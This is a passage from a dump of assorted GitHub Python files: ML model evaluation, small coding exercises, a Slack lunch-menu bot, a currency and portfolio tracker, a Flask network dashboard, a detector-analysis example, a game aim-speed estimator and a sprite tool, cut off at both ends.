x_split = dataNormalisation(dataset)\n y_split = dataset['Status']\n\n cv = ShuffleSplit(n_splits=10) # 10 fold Cross-validation initialise\n\n return x_split, y_split, cv\n\n\nif __name__ == '__main__':\n # Preparing data for training\n df = dataImport('clinical_dataset.xlsx')\n x_split, y_split, cv = dataPreprocessing(df)\n\n # ANN classifier with 2 hidden layers of 50 neurons\n ANN_Classifier50 = MLPClassifier(hidden_layer_sizes=(50, 50), activation='logistic', solver='lbfgs', verbose=1,\n tol=0.000000001, random_state=13)\n\n # ANN classifier with 2 hidden layers of 500 neurons\n ANN_Classifier500 = MLPClassifier(hidden_layer_sizes=(500, 500), activation='logistic', solver='lbfgs', verbose=1,\n tol=0.000000001, random_state=13)\n\n # ANN classifier with 2 hidden layers of 100 neurons\n ANN_Classifier1000 = MLPClassifier(hidden_layer_sizes=(1000, 1000), activation='logistic', solver='lbfgs',\n verbose=1,\n tol=0.000000001, random_state=13)\n\n # Calculate the mean accuracy over 10 iterations\n ANN_scores50 = cross_val_score(ANN_Classifier50, x_split, y_split, cv=cv)\n ANN_scores500 = cross_val_score(ANN_Classifier500, x_split, y_split, cv=cv)\n ANN_scores1000 = cross_val_score(ANN_Classifier1000, x_split, y_split, cv=cv)\n\n # Random forest classifier with 20 trees\n RF_classifier20 = RandomForestClassifier(n_estimators=20, min_samples_leaf=5, verbose=1, random_state=13)\n\n # Random forest classifier with 500 trees\n RF_classifier500 = RandomForestClassifier(n_estimators=500, min_samples_leaf=5, verbose=1, random_state=13)\n\n # Random forest classifier with 10000 trees\n RF_classifier10000 = RandomForestClassifier(n_estimators=10000, min_samples_leaf=5, verbose=1, random_state=13)\n\n # Calculate the mean accuracy over 10 iterations\n RF_scores20 = cross_val_score(RF_classifier20, x_split, y_split, cv=cv)\n RF_scores500 = cross_val_score(RF_classifier500, x_split, y_split, cv=cv)\n RF_scores10000 = cross_val_score(RF_classifier10000, x_split, y_split, cv=cv)\n\n # 
Print the results\n print(\"Mean accuracy for ANN classifier with 50 neurons over 10-fold CV:\", ANN_scores50.mean())\n print(\"Mean accuracy for ANN classifier with 500 neurons over 10-fold CV:\", ANN_scores500.mean())\n print(\"Mean accuracy for ANN classifier with 1000 neurons over 10-fold CV:\", ANN_scores1000.mean())\n print(\"------------------------------------------------------------------------------------------------\")\n print(\"Mean accuracy for random forest classifier with 20 trees over 10-fold CV:\", RF_scores20.mean())\n print(\"Mean accuracy for random forest classifier with 500 trees over 10-fold CV:\", RF_scores500.mean())\n print(\"Mean accuracy for random forest classifier with 10000 trees over 10-fold CV:\", RF_scores10000.mean())\n","repo_name":"AstellJ11/ML-models-for-cancer-detection","sub_path":"model_evaluation.py","file_name":"model_evaluation.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"7352299070","text":"def is_isogram(xword):\n diction = {}\n for i in range(len(xword)):\n if not xword[i] in diction.keys():\n diction[xword[i]] = 1\n else:\n return False\n return True \n\nwords = [\"dermatoglyphics\",\"palindrome\", \"anagram\"]\n\nfor w in words:\n print(is_isogram(w))","repo_name":"JaredTully/C200jttully","sub_path":"Assignment8/isogram.py","file_name":"isogram.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"14195815175","text":"# from pudb import set_trace; set_trace()\nfrom typing import List\nfrom bisect import bisect_right\n\n\nclass Solution1:\n def intToRoman(self, num: int) -> str:\n \"\"\"This is not the best solution. I knew it because I have done this\n problem before, and the best solution does NOT look like this. This is\n just a solution. It starts from the left of the number and goes to the\n right. For instance, given a number abcd, we first look at a * 1000 and\n see how that number can be represented. Then we move on to b * 100, c *\n 10, and eventually d.\n\n For each value, we look up in the key list to find the biggest key\n that does not exceed the value. We know for sure that the biggest key\n that does not exceed the value must be used. So we repeatedly add the\n Roman symbol represented by the key, and remove the key from the value,\n until the value becomes 0.\n\n O(N), 56 ms, 39% ranking.\n \"\"\"\n symbols = {\n 1: 'I',\n 4: 'IV',\n 5: 'V',\n 9: 'IX',\n 10: 'X',\n 40: 'XL',\n 50: 'L',\n 90: 'XC',\n 100: 'C',\n 400: 'CD',\n 500: 'D',\n 900: 'CM',\n 1000: 'M',\n }\n str_num = str(num)\n power = len(str_num) - 1\n res = ''\n key_lst = list(symbols.keys())\n for d in str_num:\n val = int(d) * 10**power\n while val:\n idx = bisect_right(key_lst, val) - 1\n res += symbols[key_lst[idx]]\n val -= key_lst[idx]\n power -= 1\n return res\n\n\nclass Solution2:\n def intToRoman(self, num: int) -> str:\n \"\"\"This is the official good solution. In a sense, Solution1 is actually\n in the ballpark of this solution, but we use bisect to locate which key\n to use for the current value. This is not necessary, because it is\n guaranteed that the key to use will always go from the largest to the\n smallest. So we only need to keep a pointer going from the largest key\n downwards and remove as many keys as possible for each value encountered\n\n This is the third time I have done this problem. 
I sincerely hope that\n I can remember this solution.\n \"\"\"\n symbols = {\n 1: 'I',\n 4: 'IV',\n 5: 'V',\n 9: 'IX',\n 10: 'X',\n 40: 'XL',\n 50: 'L',\n 90: 'XC',\n 100: 'C',\n 400: 'CD',\n 500: 'D',\n 900: 'CM',\n 1000: 'M',\n }\n res = ''\n key_lst = list(symbols.keys())[::-1]\n i = 0\n while num and i < len(key_lst):\n if num >= key_lst[i]:\n res += symbols[key_lst[i]]\n num -= key_lst[i]\n else:\n i += 1\n return res\n\n\nsol = Solution2()\ntests = [\n (3, 'III'),\n (4, 'IV'),\n (9, 'IX'),\n (58, 'LVIII'),\n (1994, 'MCMXCIV'),\n]\n\nfor i, (num, ans) in enumerate(tests):\n res = sol.intToRoman(num)\n if res == ans:\n print(f'Test {i}: PASS')\n else:\n print(f'Test {i}; Fail. Ans: {ans}, Res: {res}')\n","repo_name":"FanchenBao/leetcode","sub_path":"2021_03_challenge/03_10_2021.py","file_name":"03_10_2021.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"71495721185","text":"from tkinter import *\nfrom typing import *\n\nfrom models import TargetFile, TargetFileOperation\nimport core.impl\nfrom ui.tk.picker import Picker\nfrom ui.tk.variable_watcher import VariableWatcher\n\nclass SelectPanel(Frame):\n def __init__(self, targets: List[TargetFile], shape: Tuple[int, int], *, parent = None, cnf = {}, **kw):\n super().__init__(master=parent, cnf=cnf, **kw)\n self.mode_radios: List[Radiobutton] = []\n self.pickers: List[Picker] = []\n self.mode_int_var = IntVar(master=self)\n self.mode_int_var.set(core.impl.config_impl.current_mode.value)\n if all(target.operation == TargetFileOperation.ignore for target in targets):\n for target in targets:\n target.operation = core.impl.config_impl.default_operation\n self.targets = targets\n for k, v in TargetFileOperation.__members__.items():\n self.mode_radios.append(\n Radiobutton(\n master=self,\n variable=self.mode_int_var,\n value=v.value, \n text=TargetFileOperation.display_of(v)\n )\n )\n self.shape = shape\n self.setup_grid_layout()\n self.mode_int_var.trace(\"w\", VariableWatcher(self.on_var_changed, 0))\n\n\n def setup_grid_layout(self):\n index = 0\n size = (core.impl.config_impl.grid_width, core.impl.config_impl.grid_height)\n y, x = self.shape\n for row in range(y):\n enough = False\n for column in range(x):\n if index < len(self.targets):\n target_file = self.targets[index]\n picker = Picker(target_file, size, parent=self)\n self.pickers.append(picker)\n picker.grid(row=row, column=column)\n index += 1\n else:\n break\n else:\n enough = True\n if not enough:\n row += 1\n break\n else:\n row += 1\n for i in range(len(self.mode_radios)):\n self.mode_radios[i].grid(row=row, column=i)\n\n def on_var_changed(self):\n self.mode = TargetFileOperation.from_int(self.mode_int_var.get())\n \n @property\n def mode(self) -> TargetFileOperation:\n return core.impl.config_impl.current_mode\n \n @mode.setter\n def mode(self, value: TargetFileOperation):\n core.impl.config_impl.current_mode = value\n self.mode_int_var.set(self.mode.value)","repo_name":"DarrenDanielDay/BackupManager","sub_path":"ui/tk/select_panel.py","file_name":"select_panel.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40412767535","text":"import json\nimport requests\nimport pprint\nimport argparse\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n \"-s\",\n action='store_true',\n help=\"post to slack\")\n\nparser.add_argument(\n \"-wp\",\n action='store_true',\n 
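# with this flag set, dishes whose price field is empty are filtered out in get_daily_dishes()\n    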
help=\"display only dishes with price\")\n\nargs = parser.parse_args()\n\n\nclass Slack:\n\n def __init__(self):\n if args.s:\n self.hook_link = get_data_from_token(\"slack-web-hook-link\")\n\n def post(self, menus):\n for menu in menus:\n post_data = {\"text\": menu}\n if args.s:\n data = json.dumps(post_data, ensure_ascii=False).encode('utf8')\n requests.post(self.hook_link, data=data)\n else:\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(json.dumps(post_data))\n\n\nclass Zomato:\n\n def __init__(self):\n self.token = get_data_from_token(\"zomato-token\")\n\n def get_daily_dishes(self, res_id, name):\n payload = {'res_id': res_id}\n headers = {'user_key': self.token}\n r = requests.get(\n \"https://developers.zomato.com/api/v2.1/dailymenu\",\n params=payload,\n headers=headers)\n if r.status_code == requests.codes.ok:\n dishes = r.json()[\"daily_menus\"][0][\"daily_menu\"][\"dishes\"]\n if args.wp:\n dishes = list(filter(\n lambda x: len(x[\"dish\"][\"price\"]) > 0,\n dishes))\n return self.format_data(dishes, name)\n else:\n return self.no_daily_menu(name)\n\n def format_data(self, data, restaurant_name):\n dishes = \"*\" + restaurant_name + \"*\" + \"\\n\"\n for dish in data:\n dishes += dish[\"dish\"][\"name\"] + \"\\n\"\n return dishes\n\n def no_daily_menu(self, restaurant_name):\n dishes = \"*\" + restaurant_name + \"*\" + \"\\n\"\n dishes += \"no daily menu\"\n return dishes\n\n def read_restaurants(self):\n with open('restaurants.json', encoding=\"utf-8\") as restaurants_file:\n restaurants = json.load(restaurants_file)\n return restaurants\n\n\ndef get_data_from_token(id):\n with open('config.json', encoding=\"utf-8\") as tokens_file:\n tokens_json = json.load(tokens_file)\n token = tokens_json[id]\n return token\n\n\nzom = Zomato()\n\nmenus = list()\n\nfor restaurant in zom.read_restaurants():\n rest_id = restaurant[\"id\"]\n rest_name = restaurant[\"name\"]\n menus.append(zom.get_daily_dishes(rest_id, rest_name))\n\nslack = Slack()\nslack.post(menus)\n","repo_name":"AquaSoup/slackfood","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34877907079","text":"import sys\n# import datetime\nfrom datetime import datetime as dt\nfrom datetime import timedelta\n\nimport yfinance as yf\nimport yahoo_fin.stock_info as si\nfrom PySide6 import QtWidgets\nfrom PySide6.QtWidgets import QApplication, QMainWindow\nfrom PySide6.QtSql import QSqlTableModel\nfrom currency_converter import CurrencyConverter\n\nfrom connection import Data\nfrom main_form import Ui_MainWindow\nfrom NewTransaction import Ui_Dialog\nfrom Currency import Ui_Dialog as Ui_Currency\nfrom portfolio_meneger import Ui_Dialog as Ui_Portfolio\n\n\nclass ExpenseTracker(QMainWindow):\n def __init__(self):\n super(ExpenseTracker, self).__init__()\n self.new_window = None\n self.model = None\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.init_ui()\n self.conn = Data()\n\n def init_ui(self):\n self.ui.ButtonConverter.clicked.connect(self.open_converter)\n self.ui.Button_NewTransaction.clicked.connect(self.open_new_transaction_window)\n self.ui.PortfolioMeneger.clicked.connect(self.open_portfolio_window)\n\n def open_new_transaction_window(self):\n self.new_window = QtWidgets.QDialog()\n self.ui_window = Ui_Dialog()\n self.ui_window.setupUi(self.new_window)\n self.new_window.show()\n\n def open_converter(self):\n self.new_window = QtWidgets.QDialog()\n self.ui_window = 
Ui_Currency()\n self.ui_window.setupUi(self.new_window)\n\n self.ui_window.input_currency.setText(\"USD\")\n self.ui_window.output_currency.setText(\"RUB\")\n self.ui_window.input_amount.setText(\"100\")\n self.new_window.show()\n self.ui_window.ButtonConvert.clicked.connect(self.convert)\n\n def open_portfolio_window(self):\n self.new_window = QtWidgets.QDialog()\n self.ui_window = Ui_Portfolio()\n self.ui_window.setupUi(self.new_window)\n self.ui_window.button_show_allocation.clicked.connect(self.show_allocation)\n self.ui_window.button_add_new_share.clicked.connect(self.add_new_share)\n\n self.new_window.show()\n\n def convert_CC(self):\n conv = CurrencyConverter()\n input_currency = self.ui_window.input_currency.text()\n output_currency = self.ui_window.output_currency.text()\n input_amount = int(self.ui_window.input_amount.text())\n date_time_str = self.ui_window.dateEdit.text()\n date_time_obj = dt.strptime(date_time_str, '%d.%m.%Y')\n # output_amount = conv.convert(input_amount, '%s' % (input_currency), '%s' % (output_currency), date_time_obj)\n output_amount = conv.convert(input_amount, input_currency, output_currency, date_time_obj)\n self.ui_window.output_amount.setText(str(output_amount))\n\n def convert(self):\n # yahoofin\n input_currency = self.ui_window.input_currency.text()\n output_currency = self.ui_window.output_currency.text()\n input_amount = int(self.ui_window.input_amount.text())\n date_time_str = self.ui_window.dateEdit.text()\n date_time_obj = dt.strptime(date_time_str, '%d.%m.%Y')\n # construct the currency pair symbol\n symbol = f\"{input_currency}{output_currency}=X\"\n latest_data = si.get_data(symbol, interval=\"1d\", start_date=date_time_obj+timedelta(days=-2), end_date=date_time_obj)\n latest_price = latest_data.iloc[-1].close\n\n output_amount = latest_price * input_amount\n self.ui_window.output_amount.setText(str(output_amount))\n\n def show_allocation(self):\n self.update_all_prices()\n self.conn.update_percentages()\n\n self.model = QSqlTableModel(self)\n self.model.setTable('portfolio')\n self.model.select()\n self.ui_window.tableView.setModel(self.model)\n\n def add_new_share(self):\n share = self.ui_window.Share.text()\n quantity = int(self.ui_window.Quantity.text())\n self.conn.add_new_share_query(share, quantity, 10)\n self.show_allocation()\n\n def update_all_prices(self):\n shares = self.conn.get_all_shares()\n\n today_data = dt.today()\n today_str = today_data.strftime(\"%Y-%m-%d\")\n start_data = today_data + timedelta(days=-10)\n start_str = start_data.strftime(\"%Y-%m-%d\")\n\n for ticker in shares:\n data = yf.download(ticker, start_str, today_str)['Adj Close']\n if data.empty:\n continue\n\n # надо брать последнюю цену, а запрос не возвращает предыдущую цену\n # если запросить только одну дату и на нее не окажется цены\n price = data[data.size - 1]\n self.conn.update_price(ticker, float(price))\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = ExpenseTracker()\n window.show()\n\n sys.exit(app.exec())\n","repo_name":"brava05/FamilyExpenses","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"8473149440","text":"import numpy, wave, array\nimport os\n\nDOWNLOADE_DIR = os.path.dirname(os.path.abspath(__file__)) + '/wav_output/'\n\ndef create_wavefile(filename,data):\n filename = DOWNLOADE_DIR + filename + \".wav\"\n\n # save wav file\n buf = data\n w = wave.Wave_write(filename)\n 
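update_all_prices in the record above reads the last close with data[data.size - 1], an integer key on a date-indexed Series, which leans on pandas' deprecated positional fallback. A sketch of the explicit form under the same yfinance call (ticker and dates are illustrative):

import yfinance as yf

data = yf.download('AAPL', '2023-01-01', '2023-01-10')['Adj Close']
if not data.empty:
    price = float(data.iloc[-1])  # explicit positional access to the latest close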
w.setparams((\n 1, # channel\n 2, # byte width\n 16000, # sampling rate\n len(buf), # number of frames\n \"NONE\", \"not compressed\" # no compression\n ))\n w.writeframes(array.array('h', buf).tostring())\n w.close()\n\n return\n","repo_name":"KaijiS/Cut_Vowel","sub_path":"upload_form/vowel_cut/create_wav.py","file_name":"create_wav.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1324676183","text":"from flask import Flask, render_template, jsonify, request\r\nimport ipPublique\r\nimport ping3\r\nimport main\r\nimport subprocess\r\n\r\n\r\nping_target = \"1.1.1.1\"\r\napp = Flask(__name__)\r\n# default page\r\n@app.route('/')\r\ndef home():\r\n latency = round(ping3.ping(ping_target, unit='ms'),2)\r\n return render_template('index.html', variable=ipPublique.public_ip, latency=latency , hostname=ping_target, nmap=main.hosts)\r\n\r\n\r\n# -------------------------------API------------------------------------\r\n# PING api request\r\n# @app.route('/ping', methods=['POST'])\r\n# def ping():\r\n# try:\r\n# latency = round(ping3.ping(ping_target, unit='ms'),2)\r\n# print(\"PINGED\")\r\n# return jsonify(latency)\r\n# except Exception as e:\r\n# return str(e)\r\n\r\n# Restart api request\r\n@app.route('/restart_vm', methods=['POST'])\r\ndef restart_vm():\r\n vm_ip = '192.168.116.196'\r\n command = f\"sudo reboot {vm_ip}\" \r\n subprocess.call(command, shell=True)\r\n return \"La SemaBox a été redémarrée avec succès !\"\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True,host='0.0.0.0', port='5000')","repo_name":"aurelien-vanbelle/public","sub_path":"SemaBox/src/flask SemaLynx/Site.py","file_name":"Site.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71447473823","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport sys\nimport psana\nfrom time import time\nfrom Detector.GlobalUtils import print_ndarr\n\n##-----------------------------\n\nntest = int(sys.argv[1]) if len(sys.argv)>1 else 1\nprint('Test # %d' % ntest)\n\n##-----------------------------\n\ndsname, src = 'exp=cxii8715:run=15', 'CxiEndstation.0:Quartz4A150.0' # or alias='Sc1Questar'\nprint('Example for\\n dataset: %s\\n source : %s' % (dsname, src))\n\n#psana.setOption('psana.calib-dir', './calib')\n\nds = psana.DataSource(dsname)\nevt = next(ds.events())\nenv = ds.env()\nnrun = evt.run()\n\nfor key in evt.keys() : print(key)\n\n##-----------------------------\nfrom Detector.AreaDetector import AreaDetector\n\npar = nrun # evt or nrun\ndet = AreaDetector(src, env, pbits=0, iface='P') # iface='P' or 'C'\n\nins = det.instrument()\nprint(80*'_', '\\nInstrument: ', ins)\n#det.set_print_bits(511);\n#det.set_def_value(-5.);\n#det.set_mode(1);\n#det.set_do_offset(True); # works for ex. 
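create_wavefile above ends with array.array('h', buf).tostring(), an alias that was removed in Python 3.9; tobytes() is the drop-in replacement. A sketch of the write on current interpreters (w is the record's wave.Wave_write, buf its sample list):

import array

def write_pcm16(w, buf):
    # tostring() was removed in Python 3.9; tobytes() produces the same bytes.
    w.writeframes(array.array('h', buf).tobytes())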
Opal1000\n\n#det.print_attributes()\n\n#shape_nda = det.shape(par)\n#print_ndarr(shape_nda, 'shape of ndarray')\n\n#print('size of ndarray: %d' % det.size(par))\n#print('ndim of ndarray: %d' % det.ndim(par))\n\n#peds = det.pedestals(par)\n#print_ndarr(peds, 'pedestals')\n\n#rms = det.rms(par)\n#print_ndarr(rms, 'rms')\n\n#mask = det.mask(par)\n#print_ndarr(mask, 'mask')\n\n#gain = det.gain(par)\n#print_ndarr(gain, 'gain')\n\n#bkgd = det.bkgd(par)\n#print_ndarr(bkgd, 'bkgd')\n\n#status = det.status(par)\n#print_ndarr(status, 'status')\n\n#status_mask = det.status_as_mask(par)\n#print_ndarr(status_mask, 'status_mask')\n\n#cmod = det.common_mode(par)\n#print_ndarr(cmod, 'common_mod')\n\nt0_sec = time()\nnda_raw = det.raw(evt)\nprint_ndarr(nda_raw, 'nda_raw')\n\ni=0\nif nda_raw is None :\n for i, evt in enumerate(ds.events()) :\n nda_raw = det.raw(evt)\n if nda_raw is not None :\n print('Detector data found in event %d' % i)\n break\n\nprint_ndarr(nda_raw, 'raw data')\n\nif nda_raw is None :\n print('Detector data IS NOT FOUND in %d events' % i)\n sys.exit('FURTHER TEST IS TERMINATED')\n\n##-----------------------------\n\n#if peds is not None and nda_raw is not None : peds.shape = nda_raw.shape \n\n#data_sub_peds = nda_raw - peds if peds is not None else nda_raw\n#print_ndarr(data_sub_peds, 'data - peds')\n\n#nda_cdata = det.calib(evt)\n#print_ndarr(nda_cdata, 'calibrated data')\n\n#nda_cdata_ub = det.calib(evt, cmpars=(5,50))\n#print_ndarr(nda_cdata_ub, 'calibrated data for cspad unbond pixels')\n\n#coords_x = det.coords_x(par)\n#print_ndarr(coords_x, 'coords_x')\n\n#areas = det.areas(par)\n#print_ndarr(areas, 'area')\n\n#mask_geo = det.mask_geo(par)\n#print_ndarr(mask_geo, 'mask_geo')\n\n#mask_geo.shape = (32,185,388)\n#print(mask_geo)\n\n\n#pixel_size = det.pixel_size(par)\n#print('%s\\npixel size: %s' % (80*'_', str(pixel_size)))\n\n##-----------------------------\nimg_arr = nda_raw\n#img_arr = data_sub_peds\n#img_arr = nda_cdata if nda_cdata is not None else nda_raw\nimg = None\n\n# Image producer is different for 3-d and 2-d arrays \nif len(nda_raw.shape) > 2 :\n #img = det.image(evt)\n img = det(evt) # alias for det.image(evt) implemented in __call__\n #img = det.image(evt, img_arr)\nelse :\n img = img_arr\n img.shape = nda_raw.shape\n\nprint_ndarr(img, 'image (calibrated data or raw)')\n\nprint(80*'_')\n\n##-----------------------------\n\nif img is None :\n print('Image is not available')\n sys.exit('FURTHER TEST IS TERMINATED')\n\nimport pyimgalgos.GlobalGraphics as gg\n\nave, rms = img.mean(), img.std()\ngg.plotImageLarge(img, amp_range=(ave-1*rms, ave+2*rms))\ngg.show()\n\n##-----------------------------\n\nsys.exit(0)\n\n##-----------------------------\n","repo_name":"lcls-psana/Detector","sub_path":"examples/ex_quartz.py","file_name":"ex_quartz.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"} +{"seq_id":"41826381755","text":"from aim_estimators import AimEstimator360, AimEstimatorPivot\nimport cv2 as cv\nfrom gimx_api import initGIMXConnection, sendAimSpeedCommand\nfrom time import sleep\nimport pandas as pd\nimport numpy as np\nimport os\nfrom cvutils import CroppedVideoCapture\n\n\ndef removeBuffer(vcap):\n for _ in range(8):\n vcap.grab()\n\n\nFPS = 60\n\n\ndef saveData(data, fpath):\n df = pd.DataFrame(data, columns=['x_axis', 'y_axis', 'x_speed'])\n df.to_csv(fpath, index=False)\n\n\ndef estimateSpeed(vcap, aim_estimator):\n fps = vcap.get(cv.CAP_PROP_FPS)\n assert(fps > 0), 
\"Could not get FPS property from video.\"\n degrees_persec = aim_estimator.estimateSpeed(vcap) * fps\n return degrees_persec\n\n\ndef estimateWithCaptureCard_auto(vid, xlist, ylist, aim_estimator, cropx=None, cropy=None):\n vcap = CroppedVideoCapture(cropx, cropy, vid)\n vcap.set(cv.CAP_PROP_FRAME_WIDTH, 1280)\n vcap.set(cv.CAP_PROP_FRAME_HEIGHT, 720)\n degrees_persec_list = []\n for x, y in zip(xlist, ylist):\n print(\"Estimating speed of (%d,%d)...\" % (x, y))\n sendAimSpeedCommand(x, y)\n sleep(0.5) # dealing with latency\n removeBuffer(vcap)\n # degrees_persec = estimateSpeed(vcap, aim_estimator)\n degrees_persec = aim_estimator.estimateSpeed(vcap) * FPS\n degrees_persec_list.append(degrees_persec)\n print(\"Estimated speed is: %f degrees per second\" % degrees_persec)\n vcap.release()\n return degrees_persec_list\n\n\ndef estimateVideoFile(video_files_list, aim_estimator, cropx=None, cropy=None):\n degrees_persec_list = []\n for vfile in video_files_list:\n assert(os.path.isfile(vfile)), \"File not found: %s\" % vfile\n vcap = CroppedVideoCapture(cropx, cropy, vfile)\n degrees_persec = estimateSpeed(vcap, aim_estimator)\n degrees_persec_list.append(degrees_persec)\n vcap.release()\n print(\"Estimated speed of %s is: %f degrees per second\" % (vfile, degrees_persec))\n return degrees_persec_list\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input', type=str, metavar='FILE',\n required=True, help=\"Video file or csv file with video files or video capture id.\")\n parser.add_argument('-o', '--output', type=str, metavar='FILE',\n default='data_estimated-speed.csv', help=\"output csv file\")\n parser.add_argument('-x', '--speeds-x', metavar='N', type=int, nargs='+',\n required=False, help='X speeds from -128 to 127', choices=range(-128, 128))\n parser.add_argument('-y', '--speeds-y', metavar='N', type=int, nargs='+',\n required=False, help='Y speeds from -128 to 127', choices=range(-128, 128))\n parser.add_argument('--gimx-server', type=str,\n help=\"format: IP_ADDRESS:PORT. This enables auto mode\")\n parser.add_argument('--crop', metavar='N', type=int, nargs=4,\n default=[100, 200, 100, 200],\n help='Crop video. Format: X1 X2 Y1 Y2. Example: --crop 200 320 480 600, will crop to box with top left coordinates (200,480) and bottom right (320,600).')\n parser.add_argument('--dont-crop', action='store_true')\n parser.add_argument('--pivot', type=str, help=\"Video file\")\n args = parser.parse_args()\n assert(args.speeds_x is None or (len(args.speeds_x) == len(args.speeds_y)))\n\n if(args.dont_crop):\n cropx = cropy = None\n else:\n crop = args.crop\n cropx = (crop[0], crop[1])\n cropy = (crop[2], crop[3])\n if(args.pivot is not None):\n assert(os.path.isfile(args.pivot)), \"File not found: %s\" % args.pivot\n vcap = CroppedVideoCapture(cropx, cropy, args.pivot)\n degrees_perframe = AimEstimator360().estimateSpeed(vcap)\n vcap.release()\n vcap = CroppedVideoCapture(cropx, cropy, args.pivot) # FIXME: Dont open twice\n aim_estimator = AimEstimatorPivot(vcap, degrees_perframe)\n vcap.release()\n else:\n aim_estimator = AimEstimator360()\n\n if(args.gimx_server is not None):\n gimx_ip, gimx_port = args.gimx_server.split(':')\n initGIMXConnection(gimx_ip, int(gimx_port))\n if(args.input[0].isdigit()):\n assert(len(args.speeds_x) >= 1), \"No speed x or y provided! 
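estimateSpeed above hard-asserts on CAP_PROP_FPS, yet live OpenCV captures often report 0 there instead of failing. A tolerant sketch that falls back to the record's FPS constant (the function name is hypothetical; the estimator call matches the record's AimEstimator API):

import cv2 as cv

def estimate_speed_safe(vcap, aim_estimator, fallback_fps=60):
    fps = vcap.get(cv.CAP_PROP_FPS)
    if fps <= 0:  # live capture devices commonly report 0 here
        fps = fallback_fps
    return aim_estimator.estimateSpeed(vcap) * fps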
See options --speed-x and --speed-y\"\n speeds_x = args.speeds_x\n speeds_y = args.speeds_y\n degrees_persec_list = estimateWithCaptureCard_auto(int(args.input), speeds_x, speeds_y,\n aim_estimator, cropx, cropy)\n else:\n if(args.input.endswith(\".csv\")):\n data = pd.read_csv(args.input, skipinitialspace=True)\n assert((data.columns == ['file name', 'x', 'y']).all()), 'Header of csv file should be \"file name,x,y\"'\n video_files = data['file name']\n assert(data['x'].dtype <= data['y'].dtype <= np.int64)\n speeds_x = data['x']\n speeds_y = data['y']\n else:\n # assert(len(args.speeds_x) >= 1), \"No speed x or y provided! See options --speed-x and --speed-y\"\n speeds_x = [None]\n speeds_y = [None]\n video_files = [args.input]\n degrees_persec_list = estimateVideoFile(video_files, aim_estimator, cropx, cropy)\n data = [(x, y, d) for x, y, d in zip(speeds_x, speeds_y, degrees_persec_list)]\n\n saveData(data, args.output)\n print(\"FINISHED!\")\n","repo_name":"Lucashsmello/console_aim_analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"14722767499","text":"class TrieNode:\n def __init__(self):\n self.children = [None] * 26\n self.sizes = 0\n self.is_end_of_word = False\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode()\n\n def insert(self, word: str) -> None:\n node = self.root\n for c in word:\n index = ord(c) - ord('a')\n if node.children[index] is None:\n node.children[index] = TrieNode()\n node.sizes += 1\n node = node.children[index]\n node.is_end_of_word = True\n\n def search(self, word: str) -> bool:\n node = self.root\n for c in word:\n index = ord(c) - ord('a')\n if node.children[index] is None:\n return False\n node = node.children[index]\n return node.is_end_of_word\n\n def searchLongest(self, word: str):\n ans = ''\n node = self.root\n for c in word:\n index = ord(c) - ord('a')\n if( not node.children[index] \n or node.is_end_of_word\n or node.sizes > 1 ):\n return ans\n ans += c\n node = node.children[index]\n return ans\n\n def startsWith(self, prefix: str) -> bool:\n curr = self.root\n for c in prefix:\n index = ord(c) - ord('a')\n if curr.children[index] is None:\n return False\n curr = curr.children[index]\n return True \n\nclass Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n if len(strs) == 0:\n return \"\"\n if len(strs) == 1:\n return strs[0]\n\n trie = Trie()\n for s in strs:\n trie.insert(s)\n\n return trie.searchLongest(strs[0])\n","repo_name":"Tranduchieu2002/leetcode_practice","sub_path":"0014-longest-common-prefix/0014-longest-common-prefix.py","file_name":"0014-longest-common-prefix.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"15643998437","text":"import Sprite.utils as utils\nfrom Sprite.Spd.spd_sprite_entry import spd_sprite_entry\nfrom Sprite.Spr.spr_sprite_entry import spr_sprite_entry\nfrom Sprite.Spr.tmx import tmx\nimport os\nimport sys\n\ndef GenerateSpdSprite(dds_path, sprite_id, scale_multiplier):\n sprite = spd_sprite_entry()\n\n metadata = utils.read_dds_metadata(dds_path)\n\n sprite.sprite_id = sprite_id\n sprite.sprite_x_position = 0 \n sprite.sprite_y_position = 0 \n sprite.sprite_x_length = metadata[1]\n sprite.sprite_y_length = metadata[2]\n sprite.sprite_x_scale = int(metadata[1] / scale_multiplier)\n sprite.sprite_y_scale = int(metadata[2] / 
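A quick standalone check of the Trie-based longest-common-prefix above. Note the record's Solution annotates with List[str], so `from typing import List` must appear before the class definitions when run outside LeetCode:

# Assumes the record's TrieNode, Trie and Solution classes are already defined,
# with `from typing import List` placed above them.
sol = Solution()
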